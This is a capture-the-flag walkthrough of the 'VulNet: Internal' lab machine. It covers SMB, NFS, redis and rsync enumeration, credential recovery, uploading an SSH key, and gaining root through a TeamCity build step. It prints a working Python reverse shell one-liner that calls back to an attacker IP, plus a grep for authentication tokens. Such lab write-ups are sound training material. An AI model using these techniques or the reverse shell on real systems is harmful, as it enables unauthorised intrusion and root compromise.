# VulNet: Internal ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeRBDFRnfnN53Pw_Cm0%2F-MeSFKPRBjzhOVhAYmFI%2Fimage.png?alt=media\&token=f5f8e5f7-b15a-4262-a71d-d9c1c037fadb) ## Scanning Lets run nmap scan to find open ports and the services running on them. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSGH4DfuiaT3MOidg_%2F-MeSGQV_tgzzoudEjfHh%2Fimage.png?alt=media\&token=2e951868-277b-4dab-b56f-22684dd7e454) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSGH4DfuiaT3MOidg_%2F-MeSGUz0J4z7trxrWfkG%2Fimage.png?alt=media\&token=9e2c7872-3de6-440b-9c05-542102c64501) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSGH4DfuiaT3MOidg_%2F-MeSGY9TF7vQdcnM-GCF%2Fimage.png?alt=media\&token=4490329e-4552-4cc9-a649-a35bc2616018) ## Enumeration Lets check port 9090 which is running SMB Lets first look at what shares are on the system ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSGZrX_4wh5ygiXY-1%2F-MeSHPVcid27CU43oV4Y%2Fimage.png?alt=media\&token=dac947b7-c616-47ff-9917-8c8e2f2fee0a) The Shares disk is interesting , lets try to access it as an anonymous user ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSGZrX_4wh5ygiXY-1%2F-MeSHdPTJR5o39kkkTGJ%2Fimage.png?alt=media\&token=8f522114-16e8-4da1-b383-1a4131e6c1cf) We were able to access it, lets cd into these directories and transfer all the files onto our machine Lets read the services.txt file ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSI9yJC0eJKOLTHSo9%2F-MeSIBi5npvoLwjGKnXK%2Fimage.png?alt=media\&token=a3282ab4-3f12-4021-9725-21ea3cd03c68) Looks like we have the first flag. Lets read the other files ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSI9yJC0eJKOLTHSo9%2F-MeSILexMJopwTgI0Ux7%2Fimage.png?alt=media\&token=18b04a85-d086-493f-9225-d43b0b01f401) There is nothing interesting, lets look at the other services running on the machine, lets first look at the RPC service running on port 111. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSI9yJC0eJKOLTHSo9%2F-MeSJD5mWOFa66ct27wq%2Fimage.png?alt=media\&token=f907b0f6-8ef6-4620-9696-fae58d464d8b) Looks like we have a directory, lets mount it onto our machine. First lets create a directory called mount and then use the command to mount the directory. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSI9yJC0eJKOLTHSo9%2F-MeSJYe0RMomRZ3JYa8H%2Fimage.png?alt=media\&token=17128ae9-e232-474f-9853-c2648b3eba2e) Lets look for interesting files in the directory. There is an interesting file in the redis directory. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSI9yJC0eJKOLTHSo9%2F-MeSJyML2-C9QYMMHtDK%2Fimage.png?alt=media\&token=7eb8087f-2948-4757-8bb5-d8e5ded961e9) There is a lot of information when we cat it, so lets look for pass strings so that we can get some information about the passwords and this is a configuration file ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSI9yJC0eJKOLTHSo9%2F-MeSKBuTEVkHxmt-F9d-%2Fimage.png?alt=media\&token=8917ce9c-6e60-4820-8c22-6d155784de4e) Now that we have the password, lets try to access redis and look for the second flag ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSI9yJC0eJKOLTHSo9%2F-MeSMJWCDnx7M6ZTZo0r%2Fimage.png?alt=media\&token=bbb391f8-7ac2-47b4-a766-d4f524cdf19b) We have the second flag. Now lets look at the auth Key, but we cannot GET the key so lets look at its file type ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSI9yJC0eJKOLTHSo9%2F-MeSMiD_bjojUG-XewzW%2Fimage.png?alt=media\&token=46ca771e-219b-4928-b645-6ce62a80bdd0) Now that we know its a list key type, lets read it. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSI9yJC0eJKOLTHSo9%2F-MeSN0PqlZ8i2o3oazwZ%2Fimage.png?alt=media\&token=703843d4-0de3-4355-ba80-f2618531434b) We have a base64 strings, lets decode it ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSI9yJC0eJKOLTHSo9%2F-MeSN9GY9XufCB76-y5N%2Fimage.png?alt=media\&token=2c8ba3e9-bea8-4753-abb3-e4a5cf284a8a) Looks like we have the credentials for the rsync service running on the system. Lets look at it in more detail and see what interesting files we can find. ## Exploitation ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSI9yJC0eJKOLTHSo9%2F-MeSNwZOgAz_Dob8vlXY%2Fimage.png?alt=media\&token=c28b40d3-e7d2-4b6f-a741-e6f907ab3b66) Now we can get the files onto our machine or we can try to upload our ssh key and then login using ssh into the machine. First we have to create our ssh key and then upload it to the machine. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSI9yJC0eJKOLTHSo9%2F-MeSP3tcTuCPMX6D0HO9%2Fimage.png?alt=media\&token=1b4a6f57-7d72-49ba-83ef-2013afedca90) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSI9yJC0eJKOLTHSo9%2F-MeSP_JcR6VUxZw9-9ii%2Fimage.png?alt=media\&token=0b71cb8f-b7e4-4566-9cfe-e90022dd3f89) Now we can login ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSI9yJC0eJKOLTHSo9%2F-MeSPbyAEWW17QDisnJY%2Fimage.png?alt=media\&token=a68819ad-6c30-4041-8ee9-4f984ec26cdf) Lets read the user flag ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSPe9Ur3BGWAULmN7V%2F-MeSPlYdle4zMjbCDB2m%2Fimage.png?alt=media\&token=51fca0f4-7f59-4d95-b55f-6f11725b7012) ## Privilege Escalation Looking around there is an interesting directory ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeSYmbNaPJktgDcRqKh%2Fimage.png?alt=media\&token=4c07583c-76ef-4ccf-b06a-439046508722) Lets look at this directory and read the readme file ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeSZ22V7zgTbtUa92oZ%2Fimage.png?alt=media\&token=a83aee77-05fa-4b48-bc0b-809769cfc0ef) Lets look at the ports running on the machine ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeSZIdqoqpu0Ec5tzHb%2Fimage.png?alt=media\&token=c099c2ba-2b9b-4aff-b7f1-17a08a09f93d) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeSZLxAIvgrq0aY_B_H%2Fimage.png?alt=media\&token=725dffa5-7359-4fa1-b027-f6343322e467) Something is running on port 8111. Lets set up port forwarding so that we can see what is running on this port. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeSZkwjAc5F52TDAHRI%2Fimage.png?alt=media\&token=52497331-e8f0-44b0-8ae2-2713531d7b58) Now lets go to localhost:8111 in the browser. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeSZv3bOcY7mQ5Mji72%2Fimage.png?alt=media\&token=df2aa5bd-0ccd-44f7-8346-f520912aad16) We have a TeamCity login page. Clicking on the Super User option, we need an authentication token to login, lets look for this on the machine ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeS_EFUEaki5NuXlcUs%2Fimage.png?alt=media\&token=8cf60793-fdee-4505-ada7-99c3933e2562) ``` grep -r "authentication token" 2>/dev/null ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeS_ql_cRqIxr15Ubj4%2Fimage.png?alt=media\&token=fa0ba99f-37d6-43b5-92ef-a30da3e2658a) We have tokens, lets use one of them and login. (None of them work except the last one) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeSa4wFBcipuvW-eabN%2Fimage.png?alt=media\&token=38a27fe3-3a09-4b7d-8afc-fae619aeb3de) We are logged in. Lets try to create a new project ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeSaYu3qzCycJU9E_rY%2Fimage.png?alt=media\&token=ccd522ed-9b96-4294-b96e-a26beb3cdd57) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeSab_vb2gWaSTwclLi%2Fimage.png?alt=media\&token=3d0b2ac1-6cce-4ddb-a68d-9b712aa0aa64) Lets create a new Built Configuration ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeSbXgxOcdVJoLbbx8F%2Fimage.png?alt=media\&token=6941fe5a-6c71-4867-933e-1e76ba8be870) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeSbe5Rtoak87ssUCh-%2Fimage.png?alt=media\&token=7bfdeef1-fa19-4e25-a504-8dec74728a92) Now lets go to the homepage and click on the project name ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeSblkBmwgi9llHF_2f%2Fimage.png?alt=media\&token=0df9cf09-18da-42be-b384-a92c649cf33f) Lets go to Edit Configuration Settings and then go to Built Steps and select python ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeSc5BircVHmQzCF2Sq%2Fimage.png?alt=media\&token=9ece16f8-79ee-4bff-b303-390ab8f7179b) Lets add a reverse shell to the Custom Script command option that we can choose ``` import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.13.8.64",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeScSHoaQz_yIxXWuLX%2Fimage.png?alt=media\&token=e7c4293c-9c06-4211-a566-d334d7f38c03) Lets now start a netcat listener on our machine ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeScZngYmkD0mt8AVY2%2Fimage.png?alt=media\&token=357efd37-7775-4fbc-a0b1-9a8ba85b896a) Lets save the file and run it by click run. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeScnBJZJAtzrD1ZnXy%2Fimage.png?alt=media\&token=6e7722ea-5026-4829-b915-d696802e054d) We have a shell as root, lets read the root flag. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeScy7w_zxJxixhkgFB%2Fimage.png?alt=media\&token=0c69ffaa-e702-462c-8d7e-0ff056e0e203)